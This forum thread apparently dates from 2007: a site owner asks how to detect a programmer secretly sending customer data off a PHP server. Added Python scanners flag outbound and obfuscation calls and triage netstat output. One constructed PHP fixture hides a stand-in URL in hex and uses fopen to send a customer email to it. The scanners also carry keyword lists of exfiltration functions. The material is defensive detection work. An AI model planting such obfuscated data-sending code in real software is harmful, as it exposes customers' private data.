
Possible to capture outbound traffic from server?

Trying to see if scripts are sending out sensitive information to bots.


urbanzen

4:58 am on Dec 4, 2007 (gmt 0)


Hello webmasters,

I suspect our in-house programmer has coded a script to collect emails and other sensitive customer data and send it to his server. Because it could be any of .com¦.net¦.info¦.us¦.xxwhatever, or an obfuscated IP address ping, I couldn't grep over the code and find proof.

The only way I can think of is to eavesdrop, or to read the log files, to see whether the server is calling scripts outside of its domain, or sending GET or POST requests to other servers.

Is there a good way to check on these possibilities? A way to eavesdrop, per se?

gergoe

12:40 pm on Dec 4, 2007 (gmt 0)


Outbound traffic does not go through Apache (or any other web server software); it is implemented in the programming language, and the only way to find something like that (besides searching the code) is to install/run a packet monitor application (like Ethereal [ethereal.com]), which monitors the network traffic of your server and produces a log file from it. Personally I think searching the code is much more efficient; depending on the programming language, you only need to search for a few commands. In the case of PHP, only the fopen command (and maybe a few more, but this is the most likely) needs to be looked up to see where it is being used.

urbanzen

2:16 am on Dec 5, 2007 (gmt 0)


Thank you very much George,

I'll try packet monitoring as you suggest.

There are so many ways to obfuscate outbound commands that I wouldn't know how to search in the first place.

What if it's an eval(unserialize(#*$!xx)), or hexadecimal characters, or a header() command? It's hard for me in this case to search for malicious code.
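gergoe's suggestion to grep the code for a handful of calls, and the obfuscation worry raised in the post above (eval, unserialize, hex-escaped strings, header), can be combined into one scanner. The block below is an added example, not code from the thread: it flags the PHP calls that can push data off the server, the wrapper functions that usually hide a payload, and it decodes hex-escaped and base64 string literals so a destination hidden inside them shows up in plain text. The sample checkout.php is constructed for the demo; the function lists and the scheme of what counts as "outbound" are assumptions you should extend for your own codebase.

```python
"""Static scan of PHP source for calls that can send data off the server and
for the obfuscation primitives used to hide them. Added example, not code from
the thread; the sample file at the bottom is constructed for the demo."""
import base64
import re

# Functions through which a PHP script can open a socket, send mail, run a
# shell command, or (header) redirect the visitor's browser somewhere else.
OUTBOUND_CALLS = [
    "fopen", "file_get_contents", "fsockopen", "pfsockopen", "curl_init",
    "curl_exec", "stream_socket_client", "mail", "header", "exec",
    "shell_exec", "system", "passthru", "popen",
]
# Primitives that typically wrap a hidden payload or a hidden destination.
OBFUSCATION_CALLS = [
    "eval", "unserialize", "base64_decode", "gzinflate", "gzuncompress",
    "str_rot13", "create_function",
]

CALL_RE = re.compile(r"\b(" + "|".join(OUTBOUND_CALLS + OBFUSCATION_CALLS) + r")\s*\(")
HEX_STRING_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){4,})"')   # "\x68\x74\x74\x70"
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{12,}={0,2})['\"]")
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_hex_string(literal):
    """Turn the PHP literal \\x68\\x74\\x74\\x70 into the text 'http'."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal)).decode("latin-1")


def decode_base64_text(literal):
    """Decoded text if the literal is valid base64 of printable ASCII, else None."""
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def destinations(text):
    """URLs and IPv4 literals found in a piece of text (decoded or not)."""
    return URL_RE.findall(text) + IPV4_RE.findall(text)


def scan_php_source(src, filename="<inline>"):
    """Return (filename, line_no, kind, detail) tuples for everything worth a look."""
    findings = []
    for line_no, line in enumerate(src.splitlines(), 1):
        if line.strip().startswith(("//", "#", "*", "/*")):   # skip comment lines
            continue
        for m in CALL_RE.finditer(line):
            kind = "outbound" if m.group(1) in OUTBOUND_CALLS else "obfuscation"
            findings.append((filename, line_no, kind, m.group(1)))
        for dest in destinations(line):
            findings.append((filename, line_no, "destination", dest))
        for m in HEX_STRING_RE.finditer(line):
            decoded = decode_hex_string(m.group(1))
            findings.append((filename, line_no, "hex-string", decoded))
            for dest in destinations(decoded):         # destination hidden in hex
                findings.append((filename, line_no, "destination", dest))
        for m in B64_LITERAL_RE.finditer(line):
            decoded = decode_base64_text(m.group(1))
            if decoded is not None:
                findings.append((filename, line_no, "base64", decoded))
                for dest in destinations(decoded):     # destination hidden in base64
                    findings.append((filename, line_no, "destination", dest))
    return findings


def scan_tree(files):
    """files: {path: source}. Returns all findings sorted by file and line."""
    out = []
    for path, src in sorted(files.items()):
        out.extend(scan_php_source(src, path))
    return out


# Constructed sample: a checkout page with a legitimate mail() call, a
# hex-encoded URL, and a base64-wrapped eval() payload. Not real site code.
SAMPLE_FILES = {
    "checkout.php": r"""<?php
// constructed sample for the scanner
$email = $_POST['email'];
mail('orders@example.com', 'New order', "Customer: $email");
$u = "\x68\x74\x74\x70\x3a\x2f\x2f\x32\x30\x33\x2e\x30\x2e\x31\x31\x33\x2e\x35\x2f\x63";
$fp = fopen($u . '?e=' . urlencode($email), 'r');
eval(base64_decode('ZWNobyAnaGknOw=='));
""",
}

if __name__ == "__main__":
    for f, n, kind, detail in scan_tree(SAMPLE_FILES):
        print(f"{f}:{n}: {kind:12} {detail}")
```

Run it over a real tree by reading each .php file into the dict. The "destination" findings are the ones to chase first: a hex or base64 literal that decodes to a URL or IP you do not recognise is far stronger evidence than a bare fopen(). The scanner is a triage aid, not proof of absence: string concatenation (`'ht'.'tp://'`), chr() chains, and code fetched at runtime will slip past it, which is why the packet-level monitoring suggested earlier in the thread is still worth doing alongside it.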

jdMorgan

2:35 am on Dec 5, 2007 (gmt 0)


It does not matter -- You are looking for outbound connections. Unless you proxy some incoming requests to other servers, the only 'normal' outbound connections your server will make will be for e-mail and --if you use them-- reverse-DNS lookups. Otherwise, your server just sits there waiting for inbound connections from clients.

Jim
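Jim's rule (a plain web server only initiates mail and DNS traffic; anything else needs an explanation) is easy to turn into a triage of a connection snapshot. The block below is an added example, not code from the thread: it parses `netstat -tun` / `ss -tun` style lines, decides direction from the ports the server listens on, and buckets every outbound connection as expected or unexplained. The snapshot, the listening ports, and the allowed MySQL host are all constructed assumptions for the demo.

```python
"""Triage a netstat-style connection snapshot for outbound connections a web
server has no business making. Added example, not from the thread; the
snapshot, listening ports and allowed remotes below are constructed."""
import re
from collections import Counter

LINE_RE = re.compile(
    r"^(?P<proto>tcp|udp)6?\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+)\s+(?P<raddr>\S+):(?P<rport>\d+)\s*(?P<state>\S*)"
)

# What the server is expected to talk to on its own initiative: the thread's
# list (mail, DNS) plus anything you add deliberately, e.g. your own DB host.
EXPECTED_REMOTE_PORTS = {25, 53}
ALLOWED_REMOTES = {("192.0.2.20", 3306)}     # assumed: the site's own MySQL host
LISTENING_PORTS = {80, 443}                  # assumed: taken from 'netstat -tln'


def parse_connections(text):
    """Parse netstat/ss lines into dicts; header and blank lines are ignored."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["lport"], d["rport"] = int(d["lport"]), int(d["rport"])
            conns.append(d)
    return conns


def classify(conn):
    """inbound if it hit a port we listen on; otherwise we initiated it."""
    if conn["lport"] in LISTENING_PORTS:
        return "inbound"
    if conn["rport"] in EXPECTED_REMOTE_PORTS or (conn["raddr"], conn["rport"]) in ALLOWED_REMOTES:
        return "outbound-expected"
    return "outbound-unexplained"


def triage(text):
    """Return {class: Counter((remote_addr, remote_port) -> count)}."""
    buckets = {k: Counter() for k in ("inbound", "outbound-expected", "outbound-unexplained")}
    for c in parse_connections(text):
        buckets[classify(c)][(c["raddr"], c["rport"])] += 1
    return buckets


def unexplained_remotes(text):
    """Sorted (addr, port, count) for outbound connections that need an explanation."""
    return sorted((a, p, n) for (a, p), n in triage(text)["outbound-unexplained"].items())


# Constructed snapshot in 'netstat -tun' layout: two visitors, one DB query,
# one mail delivery, one DNS lookup, and two connections to an outside web host.
SAMPLE_SNAPSHOT = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.0.2.10:80           198.51.100.23:51234     ESTABLISHED
tcp        0      0 192.0.2.10:443          198.51.100.77:40122     ESTABLISHED
tcp        0      0 192.0.2.10:44120        192.0.2.20:3306         ESTABLISHED
tcp        0      0 192.0.2.10:39811        203.0.113.9:25          TIME_WAIT
tcp        0      0 192.0.2.10:51022        203.0.113.5:80          ESTABLISHED
tcp        0      0 192.0.2.10:51023        203.0.113.5:80          TIME_WAIT
udp        0      0 192.0.2.10:40011        192.0.2.53:53
"""

if __name__ == "__main__":
    for addr, port, n in unexplained_remotes(SAMPLE_SNAPSHOT):
        print(f"unexplained outbound: {addr}:{port} ({n} connections)")
```

Two caveats a practitioner would add. A snapshot only shows connections alive at that instant, so a script that opens, POSTs and closes in a few milliseconds is easy to miss; run it in a loop during a test order, or rely on a packet capture as suggested earlier in the thread. And "expected" is not "clean": data sent through the server's own mail() call leaves as ordinary SMTP on port 25, so review the mail log for recipients as well.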

urbanzen

3:15 am on Dec 5, 2007 (gmt 0)


Ok, would it be possible for malicious coders to physically write data into a text file or an RSS feed on the server and ping the list at regular intervals?

Or leave open an access hole into the MySQL database (scripts coded in PHP)?

That way, it's not outbound, but inbound in this case.

I might be paranoid, but customers' information and privacy, and our company's reputation, can be at stake. So I'm extra careful when the company is working with someone I don't trust.

gergoe

5:06 pm on Dec 5, 2007 (gmt 0)


If you are so afraid of personal (sensitive?) information being stolen, then I'd suggest you find someone who can audit the application. One way to do that would be to move it to a clean server, install a packet monitor, install a file (access) monitor, use those parts of the application which work with sensitive information, and then evaluate the logs.

If you are afraid of your database being accessed directly, then introduce a proper user system and only give access to those tables to those users who really need access to that information; that's something you can do anyway.